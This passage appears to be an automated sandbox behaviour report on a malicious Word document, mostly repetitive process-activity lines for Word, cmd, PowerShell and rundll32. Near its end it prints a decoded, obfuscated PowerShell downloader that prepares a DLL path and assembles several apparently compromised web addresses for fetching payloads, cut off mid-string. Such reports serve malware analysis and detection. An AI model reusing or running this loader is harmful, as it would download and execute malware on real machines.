                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: powershell.exe, 00000005.00000002.2086923820.0000000000373000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF3278 mov eax, dword ptr fs:[00000030h]7_2_01FF3278
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002327EC mov eax, dword ptr fs:[00000030h]7_2_002327EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF3278 mov eax, dword ptr fs:[00000030h]8_2_01FF3278
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C27EC mov eax, dword ptr fs:[00000030h]8_2_001C27EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A27EC mov eax, dword ptr fs:[00000030h]9_2_001A27EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_005927EC mov eax, dword ptr fs:[00000030h]10_2_005927EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00403278 mov eax, dword ptr fs:[00000030h]11_2_00403278
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A27EC mov eax, dword ptr fs:[00000030h]11_2_001A27EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00403278 mov eax, dword ptr fs:[00000030h]12_2_00403278
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002027EC mov eax, dword ptr fs:[00000030h]12_2_002027EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_01FF27EC mov eax, dword ptr fs:[00000030h]13_2_01FF27EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E27EC mov eax, dword ptr fs:[00000030h]14_2_001E27EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002E27EC mov eax, dword ptr fs:[00000030h]15_2_002E27EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00363278 mov eax, dword ptr fs:[00000030h]16_2_00363278
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_004827EC mov eax, dword ptr fs:[00000030h]16_2_004827EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_00373278 mov eax, dword ptr fs:[00000030h]17_2_00373278
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_004327EC mov eax, dword ptr fs:[00000030h]17_2_004327EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_001B27EC mov eax, dword ptr fs:[00000030h]18_2_001B27EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_001927EC mov eax, dword ptr fs:[00000030h]19_2_001927EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_00273278 mov eax, dword ptr fs:[00000030h]20_2_00273278
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_001C27EC mov eax, dword ptr fs:[00000030h]20_2_001C27EC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'mJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
